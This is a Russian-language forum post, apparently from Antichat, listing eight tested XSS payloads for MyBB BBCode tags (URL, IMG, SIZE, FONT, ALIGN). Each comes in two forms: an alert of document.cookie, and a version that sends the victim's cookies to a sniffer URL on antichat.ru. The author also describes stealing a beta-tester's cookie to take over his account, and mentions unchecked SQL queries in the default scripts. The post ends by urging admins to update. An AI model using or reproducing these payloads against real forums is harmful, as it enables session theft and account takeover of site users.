Форум АНТИЧАТ - Заключение MyBB

Уязвимости MyBB (XSS). Заключение.

Недавно разработчики не безизвестного форума наконец поняли что у их форум не так хорошо защищен... Как только я сделал alert с куки какому-то бета-тестеру (Dale), он сразу сделал скриншот этого алерта, изза чего был расшифрован его хеш и получен доступ с его ника.

Я заметил, что после того как на оффсайте MyBB (http://www.mybboard.com/community) появилось security-обновление админа таких форумов не спешат ставить это обновление.

На оффсайте больше не работают не вложеные теги, не кавычки в тегах, однако на всех других сайтах все осталось по прежнему.

Я хорошо поискал и вот что я нашел XSS в каждом теге (кроме [COLOR]), причем наверняка есть ещё XSS, но следующего достаточно. 8 штук. (влож. теги, кавычки в тегах).
Это как бы заключение темы о уязвимостях MyBB.

(Примеры - первый показывает alert с cookies домена, второй - направляет cookies домена на сниффер antichat'a - это практическое использование)

-----------------------

1. EMAIL+URL

Код:

1. s[/URL]]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));

2. s[/URL]]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));

2. IMG+URL

Код:

1. http://aaaaaaa`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));

2. http://aaaaaaa`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));

3. SIZE, кавычки

Код:

1. [size=a4" s=`]a[/size]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));

2. [size=a4" s=`]a[/size]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));

4. SIZE+URL

Код:

1. [size=aaa]aaa[/size]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));

2. [size=aaa]aaa[/size]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));

5. FONT, кавычки

Код:

1. [font=Courier" s=`]aaaaa[/font]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));

2. [font=Courier" s=`]aaaaa[/font]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));

6. FONT+URL

Код:

1. [font=Courieraaa]aaa[/font]` xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));

2. [font=Courieraaa]aaa[/font]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));

7 ALIGN, кавычки

Код:

1. [align=left" s=`]a[/align]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));

2. [align=left" s=`]a[/align]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));

8. ALIGN+URL

Код:

1. [align=leftaaaaa]a[/align]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));

2. [align=leftaaaaa]a[/align]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));

-----------------------

Все эти эксплойты проверялись один за другим и все они работают, по крайней мере сейчас.
Не факт, что есть и другие уязвимости (например тег ALIGN, спареный с другими тегами), но писать все бессмысленно, такие XSS можно составлять пачками.

SQL инжекций найжено не было (на оффсайте), а вот скрипты стандартного архива MyBB (на моем localhoste) вообще не проверяют данные, передаваемые в mysql_query(). На оффсайте об этом позаботились.

Вывод: MyBB содержит больше XSS чем любой другой известный форум. Всем админам MyBB надо срочно обновить свои форумы до последней версии (см. официальный сайт)

KEZ.